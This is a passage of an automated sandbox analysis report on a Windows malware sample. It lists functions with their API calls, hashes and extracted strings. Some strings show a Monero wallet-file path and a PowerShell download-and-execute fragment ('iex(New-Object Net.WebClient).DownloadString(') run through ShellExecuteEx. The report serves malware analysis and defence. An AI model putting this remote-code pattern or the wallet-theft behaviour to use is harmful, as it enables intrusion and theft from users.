                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: cb8db5e02f2800df3a77282e64789d8ef4bd6adad56fadcc4b767b83ff80461e
                          • Instruction ID: d2e6878628788803fc740dcb17c03927ac5f5ad17e326620573cbb17d08cb6f6
                          • Opcode Fuzzy Hash: cb8db5e02f2800df3a77282e64789d8ef4bd6adad56fadcc4b767b83ff80461e
                          • Instruction Fuzzy Hash: 31014FB5A04608BFEB00DBE4DC49F7ABBB8EB58705F104454FA04D7291E67099089B51
                          Function 00397720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0039773B
                          • RegOpenKeyExA.ADVAPI32(80000002,00E2BE88,00000000,00020119,003976B9), ref: 0039775B
                          • RegQueryValueExA.ADVAPI32(003976B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0039777A
                          • RegCloseKey.ADVAPI32(003976B9), ref: 00397784
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: 08a8ea59ff27b3b53c6e1d2a04e8d88fabd05030b4b664760667eb91ad1d3b29
                          • Instruction ID: a241734f3ffb934f4067e92453623950949a34bd48407d1420da31ee2bfcd2ff
                          • Opcode Fuzzy Hash: 08a8ea59ff27b3b53c6e1d2a04e8d88fabd05030b4b664760667eb91ad1d3b29
                          • Instruction Fuzzy Hash: FE0112B5A4030CBFEB00DBE4DC4AFBEBBB8EB58705F104559FA05A7281DB705A049B91
                          Function 003992E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(:9,80000000,00000003,00000000,00000003,00000080,00000000,?,00393AEE,?), ref: 003992FC
                          • GetFileSizeEx.KERNEL32(000000FF,:9), ref: 00399319
                          • CloseHandle.KERNEL32(000000FF), ref: 00399327
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID: :9$:9
                          • API String ID: 1378416451-4108897303
                          • Opcode ID: 3943233a66b01b6e75de5f958ebd01fc48ae45172291cf9d6ceac6b5de662fbb
                          • Instruction ID: 452fd9cbc717bd64792a471d4d0a085ea2f1c856977c538733bc99e97081d0a1
                          • Opcode Fuzzy Hash: 3943233a66b01b6e75de5f958ebd01fc48ae45172291cf9d6ceac6b5de662fbb
                          • Instruction Fuzzy Hash: 06F03C79E40208FBDF10DFB4DC49F9E7BF9EB58710F118258B651A72C0E67096459B50
                          Function 003899C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                          • LocalFree.KERNEL32(0038148F), ref: 00389A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: 251152cac92f4f1204448afad754a70a7fbe69006cd60e1841eef95597b80e19
                          • Instruction ID: 00f62bc10d2f06762c1ce2811320b38808553349923b31f288be8432a9452333
                          • Opcode Fuzzy Hash: 251152cac92f4f1204448afad754a70a7fbe69006cd60e1841eef95597b80e19
                          • Instruction Fuzzy Hash: 803116B4A00309EFDB15DF94C885FAE7BB9FF48304F108199E911A7290D778AA45CFA1
                          Function 00392C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00392D85
                          Strings
                          • <, xrefs: 00392D39
                          • ')", xrefs: 00392CB3
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00392CC4
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00392D04
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: e17f70629b6f4febc3789008b0e9eb9644165db486d0556991bdd3a4ae6b2afc
                          • Instruction ID: 3d89e451b0134de5cba17644aebd4d6396d4cca1548951fe18068c7e3cbefaae
                          • Opcode Fuzzy Hash: e17f70629b6f4febc3789008b0e9eb9644165db486d0556991bdd3a4ae6b2afc
                          • Instruction Fuzzy Hash: D641BD71C106189ADF1AEBA0C892FEDBB78AF14300F404219E116AA191DF746A4ADFD6
                          Function 00389E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00389F41
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
                          • Opcode ID: 9b1100f8d190aaa00c936366a8070ccf5076f4d4650daf8685ab6acdc93fab45
                          • Instruction ID: 4f8e1015c50e1f6caa2cbdd99b6d6820842cb242f98a49b5f021a04ff7be7f0d
                          • Opcode Fuzzy Hash: 9b1100f8d190aaa00c936366a8070ccf5076f4d4650daf8685ab6acdc93fab45
                          • Instruction Fuzzy Hash: 04612D71A10748DBDF25EFA4CC96BED7779AF45300F008118F90A5F591EB746A06CB92
                          Function 00397E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00397E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,00E2BFA0,00000000,00020119,?), ref: 00397E5E
                          • RegQueryValueExA.ADVAPI32(?,00E3D9C0,00000000,00000000,000000FF,000000FF), ref: 00397E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00397E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: d4968b7530e54424e6999bafa8548eef040f1453c896672dd88b34ffd5d39349
                          • Instruction ID: 78733bb401f4613260b543a5ff669a32013de9ad7076e20188d879113f4ef110
                          • Opcode Fuzzy Hash: d4968b7530e54424e6999bafa8548eef040f1453c896672dd88b34ffd5d39349
                          • Instruction Fuzzy Hash: DF118CB1A44609EFDB04CB95DD4AFBBBBBCFB04B04F104119F605A7280D77458049BA1
                          Function 00399260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                          Download Yara Rule
                          APIs
                          • StrStrA.SHLWAPI(00E3E188,?,?,?,0039140C,?,00E3E188,00000000), ref: 0039926C
                          • lstrcpyn.KERNEL32(005CAB88,00E3E188,00E3E188,?,0039140C,?,00E3E188), ref: 00399290
                          • lstrlen.KERNEL32(?,?,0039140C,?,00E3E188), ref: 003992A7
                          • wsprintfA.USER32 ref: 003992C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: c0b38f44ade179499bf96e16e66e2c105aa0a22b8fd221d44008c373eb58d8d3
                          • Instruction ID: ad1e8d353323ad1ad146f47ad606d3f36ffbee88219628bbf869166dbc264012
                          • Opcode Fuzzy Hash: c0b38f44ade179499bf96e16e66e2c105aa0a22b8fd221d44008c373eb58d8d3
                          • Instruction Fuzzy Hash: 86019E7550020CAFCB04DFE8C988EAE7BB9EB58358F148548F9099B204C635AA549B91
                          Function 003812A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003812B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003812BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003812D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003812F5
                          • RegCloseKey.ADVAPI32(?), ref: 003812FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: bdbbd0f8790430e57e8f981b4ff9e92a0810127794de3b5be4fba790d75114c2
                          • Instruction ID: 4ca217422f8899104f96c4f287e36d8c2bc56c00aba07c8c38476ef559920c89
                          • Opcode Fuzzy Hash: bdbbd0f8790430e57e8f981b4ff9e92a0810127794de3b5be4fba790d75114c2
                          • Instruction Fuzzy Hash: 24011DB9A4020CBFDB00DFE0DC49FAEBBB8EB48705F008159FA0597280D6709A059B91
                          Function 0039C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: 3945fd466480ec7cb73e87d6843cc7fa155c3a1c6f45a6288a7e0f3a237c18ab
                          • Instruction ID: 6d640ad234e88d4f73e6e9de48596aa38aaec3c22f55d0abad989da78f72f567
                          • Opcode Fuzzy Hash: 3945fd466480ec7cb73e87d6843cc7fa155c3a1c6f45a6288a7e0f3a237c18ab
                          • Instruction Fuzzy Hash: F541F5B151079C5EDF238B248D95FFBBBECAB45704F1454E8E98A86182D3719A44CF60
                          Function 00396630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00396663
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00396726
                          • ExitProcess.KERNEL32 ref: 00396755
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: 9f8a8cead0972a08c0e7e563685b8fd9f588e0784b7b717534e887cc33e8fc26
